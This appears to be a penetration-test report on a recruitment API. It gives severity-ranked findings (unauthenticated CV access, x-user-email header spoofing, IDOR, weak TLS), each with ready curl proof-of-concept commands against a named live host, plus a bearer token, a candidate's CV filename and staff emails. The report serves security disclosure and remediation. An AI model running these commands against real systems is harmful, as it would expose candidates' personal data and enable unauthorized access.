XTIP Security Assessment Report

01 //

Assessment & Pentest Findings

1 Critical 4 High 1 Med

🔴 Critical Risk XTIP-002 /static/cvs/{thread_id}/{candidate_file_name}.pdf

Unauthenticated Access to Sensitive Candidate CVs

▼

Detailed Vulnerability description

Candidate CVs (resumes) containing highly sensitive personally identifiable information (PII) are stored in predictable folder directories and are served directly to the Internet without any session, authentication, or JWT token validation.

Vulnerability Impact

Severe privacy breach leading to full exposure of candidate data (names, phone numbers, home addresses, education, work records). Direct violation of major compliance standards such as GDPR and CCPA, exposing Elsewedy Electric to substantial legal risks.

Reproduction Roadmap

Retrieve a candidate's file metadata (e.g. file name: 331897_ENG. Abanoub.pdf in thread req_XEK6FK).
Construct the absolute static file URL path.
Submit a GET request using a browser or curl without passing authorization/JWT tokens.

Proof of Concept Command (PoC)

curl -I "https://ta-elsewedy-api.xyrisdigital.com/static/cvs/req_XEK6FK/331897_ENG.%20Abanoub.pdf"

🟠 High Risk XTIP-001 /api/v1/admin/usage-report

Vertical Privilege Escalation via x-user-email Header Spoofing

▼

Detailed Vulnerability description

A normal recruiter account can access administrative panel usage reports by passing a custom header x-user-email containing a valid administrator's email. The backend's authentication system incorrectly checks and trust this custom header for access authorization, overriding JWT privileges.

Vulnerability Impact

Unauthorized leakage of system analytics, user catalogs, processed statistics, assigned requisitions, and individual recruiter performance KPIs.

Reproduction Roadmap

Authenticate as a normal recruiter and extract the valid JWT token.
Include an admin user's email inside the custom x-user-email header.
Send a GET request to the restricted admin endpoint.

Proof of Concept Command (PoC)

curl -X GET -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJub3JtYWxfcmVjcnVpdGVyQGVsc3dlZHkuY29tIiwiZXhwIjoxNzc5MTA3MTU4fQ.8fGrdP6_Mjfwfn7UKUcupuk8FAxDzqAbDXS-QHegRGE" -H "x-api-key: 1234" -H "x-user-email: recruiter@elswedy.com" https://ta-elsewedy-api.xyrisdigital.com/api/v1/admin/usage-report

🟠 High Risk XTIP-003 /api/v1/talent/shortlist_candidate

Horizontal IDOR / Status Modification (Shortlist Candidate)

▼

Detailed Vulnerability description

Recruiters can modify candidate hiring pipelines and trigger shortlist/rejection statuses for requisitions assigned to other users by spoofing the owner's email inside the custom x-user-email header.

Vulnerability Impact

Compromises hiring pipeline integrity. Lowers user accountability since status changes appear under the spoofed user's credentials on backend logs.

Reproduction Roadmap

Generate a recruiter's active request body containing a target candidate ID.
Include the actual requisition owner's email inside the x-user-email header.
Send a POST request to edit candidate shortlisted status.

Proof of Concept Command (PoC)

curl -X POST -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJub3JtYWxfcmVjcnVpdGVyQGVsc3dlZHkuY29tIiwiZXhwIjoxNzc5MTA3MTU4fQ.8fGrdP6_Mjfwfn7UKUcupuk8FAxDzqAbDXS-QHegRGE" -H "x-api-key: 1234" -H "x-user-email: ahm.atef@elsewedy.com" -H "Content-Type: application/json" -d '{"candidate_id": "331897", "thread_id": "req_XEK6FK"}' https://ta-elsewedy-api.xyrisdigital.com/api/v1/talent/shortlist_candidate

🟠 High Risk XTIP-004 /api/v1/talent/get_screening_table

Horizontal Privilege Escalation / Pipeline Data Exposure

▼

Detailed Vulnerability description

Any recruiter can fetch full screening pipelines, score sheets, and AI evaluations belonging to other divisions' requisitions by including the managing recruiter's email in the custom x-user-email header.

Vulnerability Impact

Unauthorized information harvesting of confidential evaluations, justifications, scoring criteria, and candidate listings across recruitment sections.

Reproduction Roadmap

Formulate a POST request with the target thread ID (requisition ID).
Include the thread owner's email in the custom header block.
Fetch the full candidate listing.

Proof of Concept Command (PoC)

curl -X POST -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJub3JtYWxfcmVjcnVpdGVyQGVsc3dlZHkuY29tIiwiZXhwIjoxNzc5MTA3MTU4fQ.8fGrdP6_Mjfwfn7UKUcupuk8FAxDzqAbDXS-QHegRGE" -H "x-api-key: 1234" -H "x-user-email: shehab.elshabrawy@elsewedy.com" -H "Content-Type: application/json" -d '{"thread_id": "req_XR27KH"}' https://ta-elsewedy-api.xyrisdigital.com/api/v1/talent/get_screening_table

🟡 Medium Risk SSL-01 188.114.96.3:443, 188.114.97.3:443

SSL/TLS Obsolete Ciphers and Cryptographic Vulnerabilities

▼

Detailed Vulnerability description

The target endpoints accept insecure 64-bit block ciphers (e.g. DES-CBC3-SHA) rendering them vulnerable to SWEET32 collision attacks. The hosts also support TLS 1.0 CBC cipher structures which makes them vulnerable to BEAST exploits. LUCKY13 is also a threat.

Vulnerability Impact

An attacker with MITM capabilities intercepting massive amounts of encrypted TLS session data could extract cookie tokens and decrypt HTTPS traffic.

Reproduction Roadmap

Initiate a connection test using a local testssl.sh toolkit.
Scan the targets and check the vulnerabilities flags output.

Proof of Concept Command (PoC)

/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 188.114.96.3

🔵 Low Risk TLS-CIPHER-01 ta-elsewedy.xyrisdigital.com:8443

Weak Cipher Suites Enabled (TLS 1.0 & TLS 1.1)

▼

Detailed Vulnerability description

The target web service permits handshake negotiations utilizing insecure cipher suites on port 8443 under older TLS versions:
[tls10 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA]
[tls11 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA]

Vulnerability Impact

Weak encryption suites increase the threat of session eavesdropping and passive traffic decryption over legacy client browsers.

Reproduction Roadmap

Trigger a Nuclei scan using the weak-cipher-suites template.
Scan the endpoint on port 8443 and verify the extracted ciphers.

Proof of Concept Command (PoC)

nuclei -t ssl/weak-cipher-suites.yaml -u https://ta-elsewedy.xyrisdigital.com:8443

🟠 High Risk INFO-01 /api/v1/talent/chat/requisitions

LLM Chat Endpoint Exposure & Hardcoded Static API Key

▼

Detailed Vulnerability description

Static analysis of the client-side JavaScript bundle (index.js) exposed the path structure of an internal AI LLM chatbot endpoint and a hardcoded static API key parameter (x-api-key: 1234) in local storage fetch functions (lr()).

Vulnerability Impact

Permits direct interaction with the AI LLM interface, raising prompt injection risks or resource exhaustion threats since query validations may be absent.

Reproduction Roadmap

Download index.js and scan for common endpoint structures.
Identify references to chat/requisitions and the x-api-key key.
Construct a curl POST command utilizing the hardcoded credentials.

Proof of Concept Command (PoC)

curl -X POST 'https://ta-elsewedy-api.xyrisdigital.com/api/v1/talent/chat/requisitions' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJub3JtYWxfcmVjcnVpdGVyQGVsc3dlZHkuY29tIiwiZXhwIjoxNzc5MTA3MTU4fQ.8fGrdP6_Mjfwfn7UKUcupuk8FAxDzqAbDXS-QHegRGE" -H "x-api-key: 1234" -H "x-user-email: normal_recruter@elsewedy.com" -H "Content-Type: application/json" -d '{"message": "hello", "user_email": "normal_recruter@elsewedy.com"}'

🟢 Info / Recon TLS-VER-01 ta-elsewedy.xyrisdigital.com:8443

Support for Deprecated TLS 1.0 and TLS 1.1 Protocols

▼

Detailed Description

The host permits connection handshakes using obsolete TLS 1.0 and TLS 1.1 protocols.

Vulnerability Impact

Older TLS versions are deprecated due to their susceptibility to downgrade attacks and lack of support for robust modern encryption standards.

Reproduction Roadmap

Scan the endpoint using Nuclei's deprecated-tls template.
Verify output highlights active connections under TLS 1.0 or 1.1.

Proof of Concept Command (PoC)

nuclei -t ssl/deprecated-tls.yaml -u https://ta-elsewedy.xyrisdigital.com:8443

02 //

Core Software Vulnerabilities (CVE Grid)

CVE ID	Severity	CVSS Score	Affected Component	Vulnerability Description & Mitigation Roadmap
CVE-2023-44487	🟠 High	7.5	`apple:swiftnio_http/2`	HTTP/2 Rapid Reset Exploit: Allows high CPU denial of service attacks by sending successive HEADERS and RST_STREAM frames. Mitigation: Upgrade SwiftNIO to the latest stable release.
CVE-2023-3766	🟡 Medium	5.9	`cloudflare:odoh-rs`	Oblivious DNS-over-HTTPS cryptographic degradation: Potential tracking anomaly in Cloudflare's Oblivious DoH Rust component. Mitigation: Update `odoh-rs` library references on DNS endpoints.

03 //

Infrastructure & DNS Profile

Resolved IP Targets & CDN

Active IPv4 Host 1 188.114.96.3

Active IPv4 Host 2 188.114.97.3

CDN Provider Cloudflare, Inc. (Anycast)

Resolved Server Headers server: cloudflare

DNS Record Details (xyrisdigital.com)

Primary DNS Name Server ainsley.ns.cloudflare.com

SOA Admin Mailbox dns.cloudflare.com

Zone Serial Number 2404249384

Active AAAA IPv6 Records 2a06:98c1:3121::3

04 //

Strategic Remediation Roadmap

Phase 1 // Immediate Action (24 Hours)

Restrict Static CV Access & Validate JWT Tokens

Enforce JWT authorization middleware on the /static/cvs/ directories. Restrict direct file calls by validating the requesting user's identity and active session token before returning any PDF candidate documents.

Phase 2 // Short-Term Action (72 Hours)

Fix x-user-email Header Spoofing & Patch HTTP/2 Rapid Reset

Decommission reliance on x-user-email header values across backend controllers. Secure user permissions by parsing sub claims directly from verified JWT signatures. Concurrently, upgrade all swiftnio_http/2 dependencies to remediate CVE-2023-44487.

Phase 3 // Mid-Term Action (1 Week)

Secure Disallowed Ciphers & TLS Versions

Modify TLS configurations to drop obsolete TLS 1.0, 1.1, and weak SWEET32/BEAST block ciphers on backend gateways and web services.

Encrypted Assessment Report

Vulnerability Discovery & Pentest Report

Assessment & Pentest Findings

Core Software Vulnerabilities (CVE Grid)

Infrastructure & DNS Profile

Strategic Remediation Roadmap

Restrict Static CV Access & Validate JWT Tokens

Fix x-user-email Header Spoofing & Patch HTTP/2 Rapid Reset

Secure Disallowed Ciphers & TLS Versions